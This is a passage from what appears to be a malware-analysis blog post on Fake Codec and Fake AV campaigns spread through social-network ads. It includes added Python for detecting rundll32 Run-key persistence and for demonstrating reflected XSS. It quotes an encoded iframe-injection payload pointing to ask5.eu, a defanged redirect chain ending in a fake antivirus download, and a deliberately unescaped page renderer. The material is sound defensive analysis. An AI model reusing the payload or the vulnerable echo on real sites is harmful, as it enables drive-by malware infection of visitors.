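The persistence shape above, a Run value that launches rundll32.exe against a DLL sitting under the user's own profile, is easy to check for across a fleet, because legitimate Run entries that use rundll32 almost always point at system DLLs. The following is an added example, not from the original post: it evaluates a constructed set of Run values (the first mirrors the one quoted above, the others are ordinary-looking entries) and names the ones where rundll32 loads a DLL from a user-writable location. On a live Windows host you would feed it the values read from the Run key (for example via the `winreg` module) instead of the sample dictionary; the prefix list is an assumption you would tune to your environment.

```python
"""Flag Run-key entries that load a DLL from a user-writable profile path via rundll32."""
import re
from typing import Dict, List, Optional

# Constructed sample Run values (value name -> command). The first mirrors the post.
SAMPLE_RUN_VALUES = {
    "atmsyssound": r'rundll32.exe "%AppData%\atmsyssound\atmsyssound.dll", DllInit',
    "ctfmon": r"C:\WINDOWS\system32\ctfmon.exe",
    "updater": r'"C:\Program Files\Vendor\updater.exe" /background',
    "drv": r"rundll32.exe C:\WINDOWS\system32\shell32.dll,Control_RunDLL",
}

# Assumption: roots an ordinary user can write to, so persistence here needs no admin rights.
USER_WRITABLE_PREFIXES = ("%appdata%", "%localappdata%", "%temp%", "%userprofile%",
                          r"c:\documents and settings", r"c:\users")

# Optional quotes, optional directory, rundll32 with or without .exe, then its arguments.
RUNDLL_RE = re.compile(r'^\s*"?(?:[^"\s]*\\)?rundll32(?:\.exe)?"?\s+(.+)$', re.I)

def rundll32_target(command: str) -> Optional[str]:
    """The DLL path a rundll32 command loads, or None if the command is not rundll32."""
    m = RUNDLL_RE.match(command)
    if not m:
        return None
    rest = m.group(1).strip()
    if rest.startswith('"'):                      # quoted path: take up to the closing quote
        return rest[1:rest.index('"', 1)]
    return rest.split(",")[0].split()[0]          # unquoted: path ends at ',' or whitespace

def is_user_writable(path: str) -> bool:
    """True when the path starts with one of the user-writable roots (case-insensitive)."""
    return path.lower().startswith(USER_WRITABLE_PREFIXES)

def suspicious_run_entries(values: Dict[str, str]) -> List[str]:
    """Names of Run values where rundll32 loads a DLL from a user-writable location."""
    hits = []
    for name, cmd in values.items():
        dll = rundll32_target(cmd)
        if dll and is_user_writable(dll):
            hits.append(name)
    return hits

if __name__ == "__main__":
    print(suspicious_run_entries(SAMPLE_RUN_VALUES))
```

Expand the path (`os.path.expandvars` on Windows) before hashing the DLL, so a hit can be matched against the MD5 values the post lists; the unexpanded form is what the registry stores and what this check keys on.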

No network traffic was observed after infection. There is an identifiable string in the binary, (beyond the function calls from imported Windows DLLs): dvyllawnx.dll. Googling for atmsyssound.dll, cryptwm97.dll, and dvyllawnx.dll revealed no results. While the exact functionality of the binary is currently unknown, odds are that it is an information stealer of some kind or backdoor similar to Zlob (which has been the typical payload of these Fake Codec attacks). I plan to conduct further analysis on the payload and will share in a future blog post if it is interesting.

Some lessons from this:
  • Social network sites allow users (including malicious users) to post / advertise content (including malicious content).
  • While browser alerts and anti-virus products are good tools, they are not very effective by themselves.
  • The Fake Codec / AV campaign is still alive and well after all these years, and these and other malware campaigns will continue to adapt to social networking advertisements and to payloads that are difficult to detect / analyze.

XSS Embedded iFrames

Today we saw a variety of pages being advertised that have search.htm and other pages vulnerable to cross-site scripting (XSS) being used to inject an iframe to a malicious webpage redirector. To an unknowing user following such an advertisement, they would believe that they were just visiting the intended host site unaware that the iframe was also redirecting them to malicious content.

Here are a few examples with some of the malicious XSS advertisements (do not follow these or other "hxxp" URLs below):


In each of the above examples, the parameter passed to the server's .htm or .php file is a string that includes encoded HTML. When the server processes the parameter, it displays the original parameter (users usually want to see their query string) and its results. Because the original parameter is displayed on the page without any sanitization for this type of encoded HTML, it is possible for this XSS to take place. The encoded HTML in each case is hexadecimal encoded HTML:

%3C%2F%74%69%74%6C%65%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%2F%2F%61%73%6B%35%2E%65%75%3E

which decodes to a closing </title> tag for the query string, followed by the malicious iframe to embed:

<iframe src=//ask5.eu>
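The flaw described above comes down to one thing: the decoded query is written back into the page as markup instead of as text. The following is an added example, not from the original post: it decodes the exact percent-encoded parameter quoted above, shows a vulnerable search echo beside the escaped version, and includes a small check that flags tags arriving in a query string (useful on the log or WAF side). The page template and the helper names are constructed for this example.

```python
"""Reflected XSS via a search echo: the decoded query, the vulnerable and hardened renderers, and a detector."""
import html
import re
from typing import List
from urllib.parse import unquote

# The percent-encoded parameter quoted in the post.
ENCODED_QUERY = ("%3C%2F%74%69%74%6C%65%3E%3C%69%66%72%61%6D%65%20%73%72%63"
                 "%3D%2F%2F%61%73%6B%35%2E%65%75%3E")

# Constructed stand-in for a search.htm page that echoes the query in the title and body.
TEMPLATE = ("<html><head><title>Search: {q}</title></head>"
            "<body>No results for {q}</body></html>")

def render_vulnerable(q: str) -> str:
    """Echoes the decoded query verbatim, which is what the affected pages did."""
    return TEMPLATE.format(q=unquote(q))

def render_hardened(q: str) -> str:
    """Echoes the query after HTML-escaping, so any markup in it is shown as text."""
    return TEMPLATE.format(q=html.escape(unquote(q), quote=True))

TAG_RE = re.compile(r"<\s*/?\s*[a-z][a-z0-9]*", re.I)

def injected_tags(q: str) -> List[str]:
    """Tag names present in the decoded query; a non-empty list means markup is being reflected."""
    return [t.strip("</ ").lower() for t in TAG_RE.findall(unquote(q))]

if __name__ == "__main__":
    print(unquote(ENCODED_QUERY))
    print(injected_tags(ENCODED_QUERY))
    print(render_vulnerable(ENCODED_QUERY))
    print(render_hardened(ENCODED_QUERY))
```

Escaping at output time is the fix; the detector is a secondary control, since an attacker can vary the encoding, and it is there to show how such requests stand out in access logs.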

ask5.eu does a Javascript redirect using parent.location.replace() to:
hxxp://alanhui.co.cc

which does a Javascript parent.location.replace() to:
hxxp://max-well2.cn/?pid=349s01&sid=dd93d9

which lands the user at:
hxxp://windows-antivirus4.com/scan1/?pid=349s1&engine=%3DHW39TjuMDQxLjYyLjEyMyZ0aW1lPTEyNjI4NUEOOAkO

and downloads:
hxxp://windows-antivirus4.com/download/Inst_349s1.exe



Fake AV malware sample:
MD5: c0d2017be29e5383b1a680ef59ed22e0
Virus Total (6/41): http://www.virustotal.com/analisis/d1a052f117f1e0e4f828c04b7cabd8428cde6b9fc11f61e6e2f3d63ec01f9152-1260851264